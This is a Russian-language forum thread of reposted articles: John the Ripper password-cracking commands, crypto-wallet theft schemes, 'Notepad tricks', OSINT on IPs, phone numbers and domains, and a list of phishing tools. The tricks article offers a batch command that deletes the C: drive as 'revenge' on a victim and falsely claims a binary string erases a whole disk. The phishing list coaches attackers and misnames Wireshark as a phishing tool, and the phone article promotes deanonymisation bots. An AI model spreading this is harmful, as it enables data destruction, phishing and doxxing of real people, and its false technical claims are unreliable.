  • john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha1 crack.txt
SHA256

  • john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 crack.txt
MD5

  • john –format=raw-md5 hash.txt
Подождите, пока файл хэша будет расшифрован. Как только файл будет расшифрован, вы увидите пароль.

Чтобы просмотреть все форматы, поддерживаемые john, введите следующую команду:

  • john –list=formats
4. Использование пользовательского списка слов для взлома паролей
Если вы хотите применить атаку по списку слов, то это займет у вас много времени и сил. Однако, вы можете облегчить себе задачу с помощью Джона Потрошителя, который использует пользовательский словарь, содержащий список наиболее часто используемых паролей по всему миру. Введите:

  • john –format=raw-sha1 –wordlist password.txt THEHASHFILE.txt
Вы можете также попробовать и следующую команду:

  • john –wordlist=/usr/share/john/password.lst hashfile
Здесь, в приведенной выше команде, мы использовали файл password.lst. Но вы можете использовать любой файл, какой захотите.



Вот вы и научились использовать инструмент John The Ripper для взлома паролей. На этом всё. Надеемся, что данная статья оказалась полезной для вас. Удачи!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150

Топ-7 способов взломать криптокошелек. Как сберечь свои средства
Вступить в наш чат
Отгадайте загадку: «Её легко украсть и почти невозможно вернуть». Совершенно верно, речь идет о криптовалюте. Мошенники всегда находятся в поисках новых схем кражи денег пользователей. А наблюдаемый в последние годы массовый рост использования криптовалюты дает большое количество возможностей для хакеров. В этой статье мы решили рассказать про различные виды угроз, с которыми может столкнуться каждый человек, а также способы противостоять злоумышленника

1. Фишинг
Этот метод состоит в том, что мошенник регистрирует домен, который на первый взгляд нельзя отличить от биткоин кошелька, но разница заключается в нескольких символах в URL-адресе. После чего он создает аналогичный сайт, который завлекает пользователей своей рекламой.
Возьмем в качестве примера известный кошелек blockchain.com. Мы набрали название в Google, и первыми выскочили несколько подозрительных ресурсов:
Открываем один из них, и мы отказываемся на фишинговом сайте, который внешне практически не отличим от официального, за исключением трех букв в домене: вместо «blockchain.com» получилось «blockrcnain.com»:
Если ввести свой ID и пароль на таком сайте, то злоумышленники смогут без проблем вывести все ваши средства. Чтобы не попасться в ловушку, достаточно добавить официальный сайт в закладки.

2. Мобильные приложения
Злоумышленники также могут орудовать в Google Play и других мобильных магазинах приложений. Суть этого развода проста: создается приложение и загружается в Гугл Маркет, где любой желающий может найти его с помощью поиска. После установки и ввода своих данные для входа, вся информация утекает прямо к злоумышленнику. Ниже приведены примеры таких приложений:
А вот один из отзывов жертвы:
Чтобы не быть обманутым, нужно искать не в поиске приложений, а на официальных сайтах. В том же Блокчейне всего 2 ссылки, одна на Google Play, а другая в App Store. Рейтинг 5 звезд и много положительных отзывов не являются показателем надежности и безопасности.

3. Взлом с помощью QR-кода
В каждом криптокошельке есть QR-код, и выглядит он так:
Если злоумышленник просканирует его, то легко сможет вывести средства с вашего кошелька. На просторах интернета много способов, как его можно заполучить, поэтому никогда и ни при каких случаях не показывайте его.

4. Браузерные расширения
Кроме того, злоумышленники могут создать расширение с тем же интерфейсом, что и у популярных криптовалютных кошельков Trezor, Metamask или Ledger. Основная цель — заставить жертву рассекретить свою сид-фразу. Используя эту фразу, вы можете восстановить доступ к своему кошельку и вывести криптовалюту. Например, если зайти в Chrome Web Store и ввести в поиске "Metamask", то мы увидим 3 кошелька, 1 из которых настоящий, а 2 от неизвестных авторов, которые мы однозначно не советуем устанавливать:
Хотя мошеннические расширения регулярно удаляются, неизбежно появляются новые:

5. Clipрer
Clipper — это программа, которая заменяет адреса кошельков в буфере обмена. Когда пользователь копирует адрес своего криптокошелька в буфер обмена, программа заменяет его адресом, принадлежащим злоумышленнику. Таким образом, когда жертва отправляет свои средства, она на самом деле отправляет их на кошелек, принадлежащий злоумышленникам.

Чтобы этого не произошло, никогда не переходите по неизвестным ссылкам, а также всегда проверяйте первую и последнюю цифры кошелька перед отправкой криптовалюты.

6. Замена SIM-карты
Уже ни раз приходилось слышать в новостях о случаях кражи средств путем замены SIM-карты. Хакеры звонят в службу поддержки мобильного оператора с просьбой восстановить номер телефона жертвы. Затем они получают доступ к учетной записи Google и могут вывести все средства:
Чтобы не потерять криптовалюту таким способом, купите отдельную SIM-карту для всех важных кошельков и никому не давайте номер телефона.

7. Скам биржи
Существуют проверенные биржи, которые славятся надёжной репутацией уже многие годы, но бывают и скамерские проекты, которые, проработав некоторое время, в один прекрасный момент исчезают с радаров вместе с вашими деньгами.
Чтобы не стать жертвой очередного скам проекта, следует торговать только на крупных площадках, которые работают не первый год. Помимо этого, не нужно хранить деньги на биржах, вместо этого отлично подойдут аппаратные кошельки.

Заключение
Итак, вы ознакомились лишь с малой частью способов кражи криптовалюты, но на самом деле их существует бесчисленное множество! Стоит проявлять предельную бдительность и осторожность, следуя всем вышеуказанным советам, а именно внимательно проверять домены, кошельки, приложения и т.д. Ведь, если злоумышленник заполучит доступ к вашему криптокошельку, у вас почти не будет шансов вернуть украденные средства, поскольку все транзакции анонимны.
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150



Трюки с Блокнотом, которые вас удивят
Вступить в наш чат
Программу Блокнот очень сильно недооценивают. Признайтесь, как часто вы пользуетесь ей? Готовы поспорить, что все ваши действия в этой программе заканчиваются на наборе случайного текста с периодичностью раз в год. А знаете ли вы, какие-либо лайфхаки с использованием Блокнота? Сегодня мы приготовили несколько необычных трюков. И все, что вам потребуется, это БЛОКНОТ!

1. Дневник/журнал

Хотите вести цифровой дневник без использования каких-либо сторонних приложений и программ? Как вы уже могли догадаться, вам понадобиться лишь Блокнот.
Шаг 1: Откройте Блокнот из меню «Пуск» или командной строки.
Шаг 2: Введите «.LOG» в первой строке.
Шаг 3: Сохраните файл как name.txt.
Теперь, когда вы открываете файл, он будет отображать дату и время, чтобы вы могли написать все, что захотите.

2. Заставьте клавиатуру мигать, как диско шар

Этот трюк заставит мигать клавиатуру, что наверняка напугает жертву, заставив думать, что ее взломали или что-то в этом роде. Скопируйте и вставьте код в Блокнот и сохраните его как «disco.vbs».
Код:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop


3. Проверьте, как хорошо работает ваш антивирус

Многие антивирусные программы могут быть эффективными и молниеносно находить вирусы, а другие нет. У вас есть возможность узнать, к какой категории относится ваш антивирус с помощью этого простого трюка. Скопируйте и вставьте приведенный ниже код в свой блокнот и сохраните его как «virus.exe» (не волнуйтесь, это не является никаким вирусом на самом деле). Затем как обычно выполните проверку на наличие вирусов.
Если этот файл обнаружится, значит, ваш антивирус исправен. В противном случае нужно начинать искать другие варианты. Это один из самых полезных лайфхаков в Блокноте.
Код:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


4. Защитите файл паролем

Наверняка, на вашем компьютере есть файлы, которые вы хотите сохранить в тайне. И вы, вероятно, используете стороннее приложение для этого. Но что, если мы скажем, что вам оно не нужно? Этот лайфхак поможет защитить файл от любопытных глаз паролем. Да, никакого стороннего софта, только несколько строк кода. Звучит круто, правда?
Скопируйте и вставьте код, написанный ниже, и сохраните файл с расширением «.bat».
Код:

title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the folder
set/p “pass=>”
if NOT %pass%== techmaniya.com goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End


5. Удалите содержимое диска C:

Хотите жестко отомстить в хакерском стиле? Этот трюк для вас. Скопируйте и вставьте приведенный ниже код, и сохраните под любым названием, но с расширением «.bat». Когда этот файл откроется на любом ПК, он сотрет весь диск C:.
Код:

@Echo off
Del C:\ *.* |y


6. Очистите весь жесткий диск

Если Блокнот может стереть весь диск C:, сможет ли он стереть весь жесткий диск? Ответ: Да. Ниже написан код для этой цели. Обязательно присвойте файлу расширение «.exe» после копирования кода в «Блокнот». Как только файл будет открыт, весь жесткий диск сотрется.
Код:

01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
В наши дни онлайн-угрозы становятся все более изощренными и непредсказуемыми. Для расследования киберпреступлений и борьбы с ними требуется ряд методов и инструментов, одним из которых является OSINT IP-адреса. Этот мощный метод включает в себя использование аналитики из открытых источников для сбора информации об IP-адресах, включая выявление угроз, отслеживание киберпреступников и раскрытие вредоносной активности.​
В этой статье мы расскажем, как работает OSINT IP-адреса, а также поделимся советами и рекомендациями по проведению эффективных и безопасных расследований.





Что такое IP-адрес

IP-адрес — это уникальный числовой идентификатор, который присваивается устройству, подключенному к Интернету. Он состоит из двух компонентов: идентификатора сети и идентификатора хоста. Адреса IPv4 являются наиболее распространенным типом и состоят из четырех наборов чисел, разделенных точками, в то время как адреса IPv6 используют более длинный и сложный формат.





Адреса IPv4 — это наиболее распространенный тип IP-адресов, состоящий из четырех чисел, разделенных точками, например 192.168.0.1. Адреса IPv6 наоборот состоят из более длинной последовательности цифр и букв, разделенных двоеточиями. Например: 2001:0db8:85a3:0000:0000:8a2e:0370:7334.
Также важно понимать, что IP-адреса могут быть динамическими или статическими. Динамические IP-адреса периодически меняются, в то время как статические IP-адреса остаются неизменными, если их не поменять вручную.
Инструменты для OSINT IP-адреса

Существует несколько инструментов для проведения OSINT-расследований. Для каждого OSINT расследователя важно выбрать правильные инструменты под свои конкретные нужды.
Whois — это протокол, используемый для поиска информации о доменных именах, IP-адресах и других сетевых ресурсах. Используя инструмент поиска Whois, вы можете собирать информацию об IP-адресах, включая организацию, которой принадлежит блок IP-адресов, и контактную информацию администратора сети.





Инструмент GeoIP позволяет определить геолокацию IP-адреса и его физическое местоположение. Это может быть полезно для отслеживания киберпреступников, которые могут действовать из определенного местоположения.





Инструмент обратного поиска Reverse Lookup можно использовать для определения доменного имени, связанного с IP-адресом. Он помогает выявлять вредоносные домены, связанные с определенным IP-адресом.



hodan — это поисковая система, которая специализируется на сканировании устройств, подключенных к Интернету, включая серверы, маршрутизаторы и устройства IoT. Выполняя поиск IP-адресов или другой сетевой информации в Shodan, можно обнаружить уязвимые устройства, которые могут быть подвержены взлому.



Maltego — популярный инструмент для анализа данных, используемый в расследованиях OSINT. С помощью него вы можете визуализировать и анализировать сложные наборы данных, включая информацию об IP-адресах, в удобном для вас интерфейсе.





Сбор информации с IP-адреса

OSINT IP-адреса может предоставить ценную информацию для расследования киберпреступлений. Собирая информацию об IP-адресах, вы можете выявить потенциальных участников киберугроз и выследить киберпреступников, а также обнаружить вредоносную активность, например, источник фишинговой атаки.
В дополнение к вышеупомянутым преимуществам сбора информации с IP-адресов, есть и другие способы, которыми OSINT IP-адреса может быть полезен для специалистов по кибербезопасности:
  1. Выявление скомпрометированных систем. Исследователи могут обнаруживать системы, в которых наблюдается подозрительная активность, путем анализа сетевого трафика, связанного с IP-адресом. Этот анализ может помочь в предотвращении кибератаки.​
  2. Проведение разведки угроз. С помощью OSINT IP-адреса специалисты по кибербезопасности собирают информацию о потенциальных киберугрозах. Они могут идентифицировать IP-адреса, связанные с известными вредоносными программами или группами киберпреступников, а также отслеживать распространение кибератак по разным сетям.​
  3. Отслеживание источника кибератак. Благодаря инструментам для OSINT IP-адреса можно отслеживать источник кибератак и идентифицировать лиц или организации, ответственные за них. Эта информация может быть использована для создания дела против киберпреступников и помощи правоохранительным органам в их расследованиях.​
Таким образом, сбор информации с IP-адресов является важной частью расследования киберугроз и защиты от кибератак.
Использование IP-адреса для цифровой криминалистики

Цифровая криминалистика — это практика сбора, анализа и сохранения электронных данных для расследования киберпреступления. OSINT IP-адреса может быть ценным инструментом, поскольку он позволяет отслеживать источник кибератак и находить доказательства.
Вот несколько способов использования OSINT IP-адреса в цифровой криминалистике:
  • Выявление вредоносного ПО. Анализируя сетевой трафик, связанный с IP-адресом, возможно не только выявить вредоносным ПО, но и отследить его источник. Это может помочь в определении масштабов кибератаки и ее предотвращении.​
  • Отслеживание киберпреступников. Используя OSINT IP-адреса, специалисты по кибербезопасности могут определить источник кибератаки и, возможно, отследить ответственных лиц. Эта информация может оказаться бесценной в судебных разбирательствах и возбуждении дела против киберпреступников.​
  • Расследование утечек данных. Эксперты могут использовать OSINT IP-адреса для расследования утечек данных и определения того, как произошла утечка. Анализируя сетевой трафик, связанный с IP-адресом, они могут выявить потенциальные уязвимости в системе и принять меры для предотвращения будущих нарушений.​
Советы для проведения OSINT IP-адреса

При проведении OSINT-расследований IP-адресов важно следовать некоторым рекомендациям:
  1. Используйте безопасные инструменты. Убедитесь, что инструменты, которые вы используете для OSINT IP-адреса, заслуживают доверия. Ищите инструменты, проверенные экспертами по кибербезопасности и имеющие надежную репутацию.​
  2. Защитите личную информацию. При проведении OSINT-расследований IP-адресов будьте осторожны, чтобы не раскрыть свою личность. Используйте VPN или другое безопасное соединение, чтобы защитить свою информацию. Не используйте личные учетные записи — например, электронную почту или профили в социальных сетях для расследования.​
  3. Проверьте свои источники. Дважды проверьте информацию, которую вы собираете с IP-адресов, чтобы убедиться, что она точна и надежна. Используйте несколько источников для подтверждения своих выводов и не полагайтесь только на один источник информации.​
Заключение

OSINT IP-адреса — это мощный инструмент для расследования киберпреступлений и борьбы с ними. Собирая информацию об IP-адресах, эксперты могут выявлять потенциальных участников угроз, отслеживать киберпреступнико​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
Что твой номер телефона расскажет о тебе?— OSINT





Вступить в наш чат​

Современные реалии таковы, что телефонные номера стали неотъемлемой частью повседневной жизни. Пользователи указывают свои номера в социальных сетях, на сайтах объявлений и в различных интернет-магазинах, но они не подозревают, что делают себя легкой добычей для хакеров и мошенников. OSINT по номеру телефона становится все более популярным методом сбора ценной информации о человеке. Вы не ослышались, всего лишь 11 цифр телефона могут быть использованы для деанона пользователя. В этой статье мы рассмотрим различные методы и инструменты, используемые для OSINT по номеру телефона.






Что может рассказать номер телефона

Одним из первых шагов в проведении OSINT по номеру телефона является сбор информации о самом телефоне. Это может включать определение оператора связи, местоположения и модель телефона. Для сбора этой информации можно использовать онлайн-сервисы. С их помощью вы можете получить важную информацию о привычках человека, например, о том, где он живет и работает.

Номера телефонов также можно использовать для поиска профилей в социальных сетях. Так, в Facebook, Instagram и ВК можно быстро найти учетную запись человека, включив поиск по контактам (предварительно нужно занести номер в свой телефон). Как только учетная запись будет идентифицирована, вы сможете собрать дополнительную информацию об онлайн-активности и интересах человека.

Номера телефонов также можно использовать для поиска в общедоступных базах данных. Например, использовать номер телефона для поиска судебных записей, ИП и других документов. Все это может дать ценную информацию о судимости человека, финансовом положении и других аспектах его личной и профессиональной жизни.
Инструменты OSINT

Существует множество способов пробива по номеру телефона. Вот некоторые инструменты, которые можно использовать для OSINT по номеру телефона:

1. Truecaller




2. Microsoft поз*воля*ет про*верять при*вяз*ку номера к акка*унту на сай*те account.live.com.





3. @bmi_np_bot — по номеру телефона определяет регион и оператора, включая новые номера.





4. @getfb_bot — выдает привязанную к номеру телефона страницу в Facebook.





5. @get_kontakt_bot — найдет как записан номер в контактах, имеет большую базу контактов.





6. nuga.app — поиск страницы Instagram по номеру. При первом сканировании найденная страница предоставляется сразу, но при последующих поисках нужно будет подписаться на соцсети создателей.





7. pipl.com — полезный ресурс для поиска человека по номеру телефона в самых популярных соц. сетях. Несмотря на то что сайт платный, есть пробный период.






Заключение

OSINT телефонного номера — это действенный способ деанона человека. Используя комбинацию инструментов и методов, разведчики могут раскрыть огромное количество информации о личной и профессиональной жизни пользователя. Будьте предельно внимательны и не указывайте информацию в социальных сетях, которая поможет вас идентифицировать. Не облегчайте сбор информации мошенниками и различным сборщикам телефонных баз.
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
OSINT домена. Собираем информацию о сайте




Вступить в наш чат​

В эпоху роста цифровых технологий нельзя недооценивать киберпреступность, которая уже стала серьезной угрозой как для отдельных лиц, так для предприятий и даже правительства. Как правило, любая хакерская атака начинается с поиска информации о цели, а некоторые атаки на этом этапе и заканчиваются. В этом цифровом хаосе важно обезопасить себя, и в случае чего первым нанести удар. Однако, для этого необходимо обладать знаниями и инструментами для поиска из открытых источников.

Сегодня мы рассмотрим такое понятие, как OSINT доменного имени, а также различные инструменты и методы, которые могут использоваться для сбора информации о сайте.






Что такое домен

Прежде чем углубиться в OSINT домена, важно иметь общее представление о том, что значит доменное имя.
Доменное имя — это адрес, который пользователи вводят в адресной строке браузера для доступа к сайту или, проще говоря, это адрес сайта в Интернете. Например, доменное имя Google — «google.com».






Доменные имена состоят из двух частей: домен верхнего уровня (TLD) и домен второго уровня (SLD). TLD — это часть доменного имени, которая стоит после последней точки, например «.ru», «.com» или «.net». SLD — это часть доменного имени, которая стоит перед TLD, например, «google» в приведенном выше примере.

В дополнение к TLD и SLD доменные имена также могут содержать поддомены, которые представляют собой дополнительные разделы, предшествующие SLD. Например, «mail.google.com» является субдоменом «google.com». Субдомены часто используются для сортировки разделов сайта или для создания иерархии контента.

OSINT домена

OSINT домена — это процесс сбора и анализа информации из открытых источников о конкретном домене (сайте). Домен OSINT может использоваться для сбора ценной информации о возможных атаках, уязвимостях и угрозах, нацеленных на какую-то организацию.

Инструменты для домена OSINT

Теперь, когда мы ознакомились с основами доменных имен, давайте рассмотрим различные инструменты для проведения OSINT-разведок.

WHOIS.net и DomainTools
Инструменты, позволяющий искать информацию о доменном имени, включая регистрационные данные и контактную информацию владельца домена.






DomainTools, SecurityTrails и DomainTools Iris

Инструменты истории домена, которые позволяют отслеживать изменения прав собственности и истории домена, включая изменения в записях DNS, IP-адресах и SSL-сертификатах.






SSLShopper и SSL Labs

Инструменты поиска SSL-сертификатов. С помощью этих инструментов можно искать сертификаты SSL, связанные с определенным доменным именем. SSL-сертификаты могут предоставить ценную информацию о владельце веб-сайта и помочь выявить вредоносную активность.







ViewDNS, Nslookup и DNSstuff

Инструменты поиска DNS могут запрашивать систему доменных имен (DNS) для получения информации об IP-адресе доменного имени, почтовых серверах и другой информации.





Каждый из этих инструментов имеет свои сильные и слабые стороны, и для успешной разведки вам потребуется использовать комбинацию этих инструментов для сбора всех необходимых данных.

Советы по проведению OSINT домена

Теперь, когда мы знаем об инструментах для OSINT-расследований, давайте посмотрим, как выжить максимум из разведки и предостеречь себя от опасности. Ниже приведены рекомендации, о которых следует помнить:

Используйте надежные инструменты: при проведении OSINT-расследований домена важно использовать безопасные инструменты, которые защищают ваши данные и личную информацию.
Защитите свои данные: будьте осторожны, когда проводите OSINT разведку, чтобы не раскрыть свою личную информацию. Используйте псевдонимы и избегайте использования личного адреса электронной почты или номера телефона.
Используйте несколько источников: не полагайтесь исключительно на один инструмент или базу данных. Важно использовать несколько источников информации.
Оставайтесь в курсе новостей: киберпреступники постоянно совершенствуют свои тактики, поэтому важно быть в курсе последних событий, новейших тенденций и технологий.


Заключение

В заключение хотелось бы отметить, что OSINT домена является одним из самых важных способов получения данных о конкретном сайте. Собирая информацию о доменных именах, вы можете выявлять источник угроз, отслеживать киберпреступников и собирать данные о конкурентах. Для проведения эффективных и безопасных OSINT-расследований важно следовать передовым методам и использовать безопасные инструменты, о которых мы вам и рассказываем. На этом все. Удачи!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
Кибербезопасность: что грозит вашему компьютеру





Вступить в наш чат​

За последние пару лет значительно возросло напряжение в киберпространстве, в том числе за счёт роста рынка киберпреступности. Только за 2022 год количество инцидентов стало больше на 21%. Согласно мнению экспертов, объем и сложность атак с каждым годом увеличиваются в геометрической прогрессии.

Знание того, как идентифицировать компьютерные угрозы является первым шагом на пути к вашей безопасности. В этой статье мы познакомим вас с распространенными киберугрозами и с тем, как вы можете защититься от них.






Что такое киберугроза

Киберугроза - угроза незаконного проникновения в виртуальном пространстве с целью хищения ценных данных. Киберугроза может привести к:

Потере или повреждению системных данных;
Незаконному мониторингу ваших действий в Сети;
Краже конфиденциальной информации.


Виды киберугроз

Ниже представлен список распространенных киберугроз:

Вирус;
Троян;
Червь;
Шпионское ПО;
Кейлоггер;
Рекламное ПО;
Атака «отказ в обслуживании» (DoS);
Фишинг.


Советы по кибербезопасности

Чтобы защитить компьютерные системы от вышеупомянутых угроз, важно комплексно подходить к этой проблеме. Используя все нижеуказанные меры безопасности, можно предотвратить, либо существенно снизить риск кибератаки.






1 Настройте двухфакторную аутентификацию. Двухфакторная аутентификация создает дополнительный уровень безопасности для защиты данных. Злоумышленнику будет недостаточно знать данные для входа — ему также потребуется ваш телефон или другая информация.
2 Используйте VPN. Каждый раз, когда вы подключаетесь к Сети через обычное соединение вы рискуете своей безопасностью. А если вы используете общедоступные Wi-Fi-соединения, например, в кофейне или коворкинге, то вы рискуете вдвойне. Такие соединения незащищены, и это означает, что трафик, идущий к устройствам, может быть перехвачен хакерами. Чтобы обезопасить свою личную информацию, важно использовать виртуальную частную сеть (VPN). Она зашифрует весь интернет-трафик и даст гарантию, что любые данные будут защищены от киберпреступников.
3 Грамотное управление паролями. Использование одних и тех же неизменных паролей – серьезный промах в вашей безопасности. Необходимо устанавливать уникальный, а главное сложный пароль для каждой учетной записи.
4 Не пренебрегайте качественным антивирусом. Для защиты от вирусов, троянов, червей и т.п. нужно использовать антивирусное программное обеспечение.
5 Регулярное обновление ОС и ПО. Причина, по которой операционные системы и программное обеспечение регулярно обновляются разработчиками, заключается в том, что они вносят исправления ошибок и создают новые патчи, способные защитить любые обнаруженные уязвимости. Не обновляя операционную систему и программное обеспечение по мере необходимости, вы оставляете бреши в системе безопасности.
6 Выполните тестирование на проникновение. Существует ряд инструментов для проверки ваших устройств на наличие уязвимостей. Проанализируйте результаты и внесите необходимые улучшения, чтобы сделать их более безопасными.
7 Делайте резервное копирование (бэкап). Это спасет от вирусов-вымогателей, которые удаляют ваши данные с ПК, а затем хакеры требует за них выкуп. С бэкапом вы всегда сможете быть уверенным, что ваши данные не пропадут бесследно.


Заключение

Обеспечение кибербезопасности — это непрерывный процесс, который нельзя прекращать ни на одну минуту и который требует постоянной вовлеченности на всех уровнях. Для защиты своих данных важно применять все необходимые действия, начиная с регулярного обновления ПО и заканчивая установкой надежного пароля. Поскольку число и сложность кибеугроз постоянно увеличивается, советуем оставаться в курсе новостей, следя за нашими статьями. На этом все. Удачи!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
Топ-10 фишинговых инструментов всех времен




Вступить в наш чат​

Возможно, вы уже ни раз сталкивались с фишингом и знаете, что существует множество способов для создания поддельных сайтов. Но так ли они все хороши? Сегодня мы подготовили для вас 10 лучших бесплатных инструментов с открытым исходным кодом, которые вам обязательно понравятся.





Прежде чем перейти к практической части, давайте освежим ваши знания о фишинге и о том, как он работает. Ну а если вы уже профи в этом деле, то переходите сразу к инструментам.

Фишинг. Почему такое название

Фишинг — это метод взлома, при котором злоумышленник создаёт поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. Фишинг — один из старейших, но наиболее эффективных методов взлома. Если раньше хакеру требовалось вручную создавать фишинговую страницу, то теперь за вас это делает специальная программа, что делает процесс взлома ещё более доступным даже для новичка.

Слово "фишинг" в переводе на английский означает "рыбачить". Такое название появилось не с проста, так как вы подобной рыбаку делаете приманку, а затем бросаете ее в воду, в ожидании того, что рыба клюнет.

Готовы поймать рыбку?​

Данная статья предоставлена исключительно в образовательных целях. Мы не несём ответственности за любые ваши действия.


Делаем приманку
С помощью инструментом возможно сделать фишинг максимально доступным. В основном инструменты фишинга применяются по трем причинам:

1) Простота в использовании;

2) Вы можете поймать много «рыбы»;

3) Любой пользователь может использовать фишинг без предварительных знаний в области программирования или скриптов.

Топ лучших инструментов
1. Ghost Phisher

Ghost Phisher — это программа для аудита безопасности и взлома Wi-Fi, написанная с использованием языка программирования Python и библиотеки графического интерфейса Python Qt. Ghost Phisher на данный момент поддерживает и интернет-хостинг веб-страницы и регистратор учетных данных (фишинг).
2. SPF (SpeedPhish Framework)

Еще одна программа на Python или просто инструмент для фишинга, созданный Адамом Комптоном. SPF состоит из множества опций, которые позволяют быстро настроить и провести эффективные фишинговые атаки. Помимо этого, инструмент имеет множеством других приятных опций (например, сбор адресов электронной почты).
3. Phishing Frenzy

Это инструмент для фишинга электронной почты. Хотя Phishing Frenzy разработан для тестирования на проникновение, он имеет множество опций, которые сделают фишинг максимально простым. Однако, Phishing Frenzy разработан на базе ОС Linux, с настройкой которой у новичка могут возникнуть трудности.
4. Gophish

Будучи фишинговой платформой с открытым исходным кодом, Gophish — это отличный вариант для начинающих фишеров. Инструмент может похвастаться простой настройкой: скачайте и извлеките ZIP-папку. Также он имеет легкий и интуитивно понятный интерфейс, а опции, хотя и ограничены, детально продуманы.
5. sptoolkit Rebirth

Хотя инструмент не имеет привлекательного интерфейса, у него есть другая существенная характеристика, которая ставит его наравне с другими в нашем рейтинге. Инструмент сочетает фишинг с безопасностью. А также имеет ряд обучающих видео, которые будут полезны новичку.
6. LUCY

Инструмент для пентестинга и фишинга. LUCY представляет собой удобную платформу, имеющую красивый интерфейс (хотя и немного сложный). Однако, некоторые необходимые параметры недоступны в бесплатной версии.
7. King Phisher

С King Phisher от SecureState мы попадаем в класс более совершенных инструментов фишинга. King Phisher Toolkit недоступен ни на одном веб-сайте, а только в Linux, поэтому убедитесь, что вы загружаете его только из Github. Возможности King Phisher многочисленны, включая одновременный запуск нескольких атак, просмотр геолокации жертв и многое другое. Пользовательский интерфейс понятен и удобен.
8. SpearPhisher Beta

SpearPhisher разработан для новичков и представляет собой программу для Windows с простым графическим интерфейсом. Это означает, что вы можете быстро создать фишинговое электронное письмо с нужными полями, а также можете отправить созданный имейл нескольким жертвам одновременно.
9. Wireshark: Phishing Tools

Wireshark — передовой в мире инструмент для фишинга. Wireshark поставляется с графическими инструментами для визуализации статистики, что упрощает анализ результатов.
10. Metasploit: Phishing Tools

Новый Metasploit от поставщика систем безопасности Rapid7 делает шаг вперед по сравнению с предыдущими версиями, предоставляя новый механизм фишинга и современные модули эксплойтов.

Заключение

Существует множество инструментов для фишинга, каждый из которых имеет свои уникальные функции. Однако, все они прекрасно справляются с поставленной задачей, а значит выбор инструмента зависит от ваших целей и знаний в области фишинга. На этом все. Удачной «рыбалки»!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150



Вступить в наш чат
Количество киберугроз, как и ущерб от хакерских атак, растет с каждым годом. По экспертным оценкам, потери от киберпреступлений достигнут $10,5 трлн в 2025 году. Поэтому на сегодняшний день важно противостоять кибератакам как на уровне государства, так и на уровне каждого пользователя за счет соблюдения необходимых шагов на пути к вашей кибербезопасности. В этой статье мы продолжаем расследовать кибератаки с помощью OSINT.
Прежде чем мы начнем, убедитесь, что вы прочитали нашу первую часть, где мы подробно рассказали про расследования таких киберпреступлений, как атаки программ-вымогателей, кражу личных данных, вредоносные ПО и социальную инженерию.


Взлом и утечка данных





Взлом и утечка данных — это киберпреступления, связанные с несанкционированным доступом к компьютеру и кражей конфиденциальной информации. С помощью OSINT можно выявлять источники взломов и утечек данных, выслеживать лиц, стоящих за ними.
Ниже приведены подходящие инструменты для расследования взломов и утечек данных:
  1. Have I Been Pwned: бесплатный онлайн-сервис, который позволяет вам проверить, была ли ваша электронная почта причастна к утечкам данным.
  2. Shodan: поисковая система для подключенных к Интернету устройств, которую можно использовать для выявления уязвимостей.
  3. Censys: поисковая система с тем же принципом работы, что и Shodan.
  4. Hunter.io: инструмент для поиска адресов электронной почты, связанных с определенным доменным именем, который может быть полезен для выявления возможных хакерских атак.
  5. TheHarvester: инструмент для сбора адресов электронной почты, субдоменов и другой информации, которая может быть полезна для выявления потенциальных уязвимостей.
Фишинг





Фишинг — это распространенный вид мошенничества, при котором злоумышленники создают поддельный сайт в точности как настоящий, при этом жертва, попадая на такой сайт, сливает свои личные данные. С помощью OSINT вы можете анализировать заголовки электронной почты, доменного имени и содержимого сообщения. Кроме того, вы можете использовать специальные инструменты для выявления фишинговых доменов и анализа их активности.
В этом вам помогут следующие инструменты:
  1. PhishTank: обширная база данных известных фишинговых URL-адресов.
  2. Maltego: инструмент интеллектуального анализа с целью нахождения взаимосвязей между данными.
  3. VirusTotal: инструмент для проверки файлов или URL-адресов на наличие вредоносных программ.
  4. Google Safe Browsing: сервис для проверки URL-адресов на предмет потенциальных фишинговых атак.
  5. WHOIS Lookup: инструмент для идентификации владельца доменного имени.
Интернет-мошенничество





